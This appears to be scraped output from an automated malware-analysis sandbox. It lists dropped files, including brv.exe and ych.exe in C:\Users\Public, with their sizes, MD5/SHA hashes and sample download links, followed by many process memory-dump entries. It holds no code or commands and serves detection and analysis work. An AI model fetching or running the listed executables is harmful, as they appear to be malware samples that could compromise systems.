C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
1e333438ff84ac126a654b2c0f63a42d

SHA1
ae99203eef6cba82c0950c56f1dbb6fd3a8a566f

SHA256
5cb5277a5eb093298c8686da50d892a63dd01ef513817776f10446fea4c671cd

SHA512
4fdf79f483a431f2bf6470d4022a72e4d3dc97fe4fea32444fa0852e5ffcea2cd2de4c233f2214f6adde6fb7ee777d615f764fe7ebabc4acee0a995b6031cc9a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
1e333438ff84ac126a654b2c0f63a42d

SHA1
ae99203eef6cba82c0950c56f1dbb6fd3a8a566f

SHA256
5cb5277a5eb093298c8686da50d892a63dd01ef513817776f10446fea4c671cd

SHA512
4fdf79f483a431f2bf6470d4022a72e4d3dc97fe4fea32444fa0852e5ffcea2cd2de4c233f2214f6adde6fb7ee777d615f764fe7ebabc4acee0a995b6031cc9a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
1e333438ff84ac126a654b2c0f63a42d

SHA1
ae99203eef6cba82c0950c56f1dbb6fd3a8a566f

SHA256
5cb5277a5eb093298c8686da50d892a63dd01ef513817776f10446fea4c671cd

SHA512
4fdf79f483a431f2bf6470d4022a72e4d3dc97fe4fea32444fa0852e5ffcea2cd2de4c233f2214f6adde6fb7ee777d615f764fe7ebabc4acee0a995b6031cc9a

Download Submit
C:\Users\Public\brv.exe
Filesize
831KB

MD5
f29f6dc54c33b2aae2950019ee54b04c

SHA1
c37d98a04edbe68fbd4e054fe0e96b1c926460ea

SHA256
8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539

SHA512
3205deea23d0655968935d26028e895d10b82594afc0ce17a5e2454a4c50584dc11564f0f1acf46ec0cc41dc0b6d3e638803934649f5834c75b04e708473967c

Download Submit
C:\Users\Public\brv.exe
Filesize
831KB

MD5
f29f6dc54c33b2aae2950019ee54b04c

SHA1
c37d98a04edbe68fbd4e054fe0e96b1c926460ea

SHA256
8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539

SHA512
3205deea23d0655968935d26028e895d10b82594afc0ce17a5e2454a4c50584dc11564f0f1acf46ec0cc41dc0b6d3e638803934649f5834c75b04e708473967c

Download Submit
C:\Users\Public\brv.exe
Filesize
831KB

MD5
f29f6dc54c33b2aae2950019ee54b04c

SHA1
c37d98a04edbe68fbd4e054fe0e96b1c926460ea

SHA256
8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539

SHA512
3205deea23d0655968935d26028e895d10b82594afc0ce17a5e2454a4c50584dc11564f0f1acf46ec0cc41dc0b6d3e638803934649f5834c75b04e708473967c

Download Submit
C:\Users\Public\brv.exe
Filesize
831KB

MD5
f29f6dc54c33b2aae2950019ee54b04c

SHA1
c37d98a04edbe68fbd4e054fe0e96b1c926460ea

SHA256
8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539

SHA512
3205deea23d0655968935d26028e895d10b82594afc0ce17a5e2454a4c50584dc11564f0f1acf46ec0cc41dc0b6d3e638803934649f5834c75b04e708473967c

Download Submit
C:\Users\Public\brv.exe
Filesize
831KB

MD5
f29f6dc54c33b2aae2950019ee54b04c

SHA1
c37d98a04edbe68fbd4e054fe0e96b1c926460ea

SHA256
8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539

SHA512
3205deea23d0655968935d26028e895d10b82594afc0ce17a5e2454a4c50584dc11564f0f1acf46ec0cc41dc0b6d3e638803934649f5834c75b04e708473967c

Download Submit
C:\Users\Public\brv.exe
Filesize
6KB

MD5
f251845a1ab43a12774e98a241c2bc4c

SHA1
71287491acf4fc24eda8c4eaeb50e01ca827acf2

SHA256
61faf60bd3fede8f96f33f86de8728bee226d1cdd164d5c569a5fa1de7148768

SHA512
036e74150fd4c8366f644431a3b7b397f00e46cc8a736971d66d383f459d1708641ca0d04d9b9b7865f868fdb17208f49090fca57ae2a9adec6207cf9c131f8c

Download Submit
C:\Users\Public\brv.exe
Filesize
6KB

MD5
f251845a1ab43a12774e98a241c2bc4c

SHA1
71287491acf4fc24eda8c4eaeb50e01ca827acf2

SHA256
61faf60bd3fede8f96f33f86de8728bee226d1cdd164d5c569a5fa1de7148768

SHA512
036e74150fd4c8366f644431a3b7b397f00e46cc8a736971d66d383f459d1708641ca0d04d9b9b7865f868fdb17208f49090fca57ae2a9adec6207cf9c131f8c

Download Submit
C:\Users\Public\ych.exe
Filesize
831KB

MD5
f29f6dc54c33b2aae2950019ee54b04c

SHA1
c37d98a04edbe68fbd4e054fe0e96b1c926460ea

SHA256
8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539

SHA512
3205deea23d0655968935d26028e895d10b82594afc0ce17a5e2454a4c50584dc11564f0f1acf46ec0cc41dc0b6d3e638803934649f5834c75b04e708473967c

Download Submit
C:\Users\Public\ych.exe
Filesize
831KB

MD5
f29f6dc54c33b2aae2950019ee54b04c

SHA1
c37d98a04edbe68fbd4e054fe0e96b1c926460ea

SHA256
8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539

SHA512
3205deea23d0655968935d26028e895d10b82594afc0ce17a5e2454a4c50584dc11564f0f1acf46ec0cc41dc0b6d3e638803934649f5834c75b04e708473967c

Download Submit
C:\Users\Public\ych.exe
Filesize
831KB

MD5
f29f6dc54c33b2aae2950019ee54b04c

SHA1
c37d98a04edbe68fbd4e054fe0e96b1c926460ea

SHA256
8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539

SHA512
3205deea23d0655968935d26028e895d10b82594afc0ce17a5e2454a4c50584dc11564f0f1acf46ec0cc41dc0b6d3e638803934649f5834c75b04e708473967c

Download Submit
\Users\Public\brv.exe
Filesize
831KB

MD5
f29f6dc54c33b2aae2950019ee54b04c

SHA1
c37d98a04edbe68fbd4e054fe0e96b1c926460ea

SHA256
8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539

SHA512
3205deea23d0655968935d26028e895d10b82594afc0ce17a5e2454a4c50584dc11564f0f1acf46ec0cc41dc0b6d3e638803934649f5834c75b04e708473967c

Download Submit
\Users\Public\ych.exe
Filesize
831KB

MD5
f29f6dc54c33b2aae2950019ee54b04c

SHA1
c37d98a04edbe68fbd4e054fe0e96b1c926460ea

SHA256
8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539

SHA512
3205deea23d0655968935d26028e895d10b82594afc0ce17a5e2454a4c50584dc11564f0f1acf46ec0cc41dc0b6d3e638803934649f5834c75b04e708473967c

Download Submit
memory/268-97-0x0000000071E90000-0x000000007243B000-memory.dmp

Filesize
5MB

Download
memory/268-111-0x0000000071E90000-0x000000007243B000-memory.dmp

Filesize
5MB

Download
memory/268-91-0x0000000000000000-mapping.dmp

Download
memory/760-61-0x0000000000000000-mapping.dmp

Download
memory/816-75-0x0000000000000000-mapping.dmp

Download
memory/816-83-0x0000000071E90000-0x000000007243B000-memory.dmp

Filesize
5MB

Download
memory/816-101-0x0000000071E90000-0x000000007243B000-memory.dmp

Filesize
5MB

Download
memory/844-54-0x0000000075831000-0x0000000075833000-memory.dmp

Filesize
8KB

Download
memory/844-66-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/892-90-0x0000000000000000-mapping.dmp

Download
memory/892-114-0x0000000071E90000-0x000000007243B000-memory.dmp

Filesize
5MB

Download
memory/892-96-0x0000000071E90000-0x000000007243B000-memory.dmp

Filesize
5MB

Download
memory/1156-55-0x0000000000000000-mapping.dmp

Download
memory/1204-59-0x0000000000000000-mapping.dmp

Download
memory/1272-76-0x0000000000000000-mapping.dmp

Download
memory/1272-106-0x0000000071E90000-0x000000007243B000-memory.dmp

Filesize
5MB

Download
memory/1272-84-0x0000000071E90000-0x000000007243B000-memory.dmp

Filesize
5MB

Download
memory/1300-73-0x0000000000000000-mapping.dmp

Download
memory/1312-100-0x0000000071E90000-0x000000007243B000-memory.dmp

Filesize
5MB

Download
memory/1312-81-0x0000000071E90000-0x000000007243B000-memory.dmp

Filesize
5MB

Download
memory/1312-65-0x0000000000000000-mapping.dmp

Download
memory/1476-86-0x0000000000000000-mapping.dmp

Download
memory/1524-89-0x0000000000000000-mapping.dmp

Download
memory/1620-71-0x0000000000000000-mapping.dmp

Download
memory/1652-74-0x0000000000000000-mapping.dmp

Download
memory/1696-62-0x0000000000000000-mapping.dmp

Download
memory/1952-82-0x0000000071E90000-0x000000007243B000-memory.dmp

Filesize
5MB

Download
memory/1952-64-0x0000000000000000-mapping.dmp

Download
memory/1952-121-0x0000000071E90000-0x000000007243B000-memory.dmp

Filesize
5MB

Download
memory/2240-112-0x0000000000970000-0x0000000000A46000-memory.dmp

Filesize
856KB

Download
memory/2240-123-0x0000000004480000-0x0000000004512000-memory.dmp

Filesize
584KB

Download
memory/2240-103-0x0000000000000000-mapping.dmp

Download
memory/2304-113-0x0000000000F70000-0x0000000001046000-memory.dmp

Filesize
856KB

Download
memory/2304-117-0x0000000004DC0000-0x0000000004E94000-memory.dmp

Filesize
848KB

Download
memory/2304-122-0x0000000000C30000-0x0000000000C7A000-memory.dmp

Filesize
296KB

Download
memory/2304-108-0x0000000000000000-mapping.dmp

Download
memory/2460-118-0x0000000000000000-mapping.dmp

Download
memory/2568-130-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2568-137-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2568-147-0x00000000004088ED-mapping.dmp

Download
memory/2568-125-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2568-124-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2580-140-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2580-142-0x00000000004088ED-mapping.dmp

Download
memory/2592-151-0x00000000004088ED-mapping.dmp

Download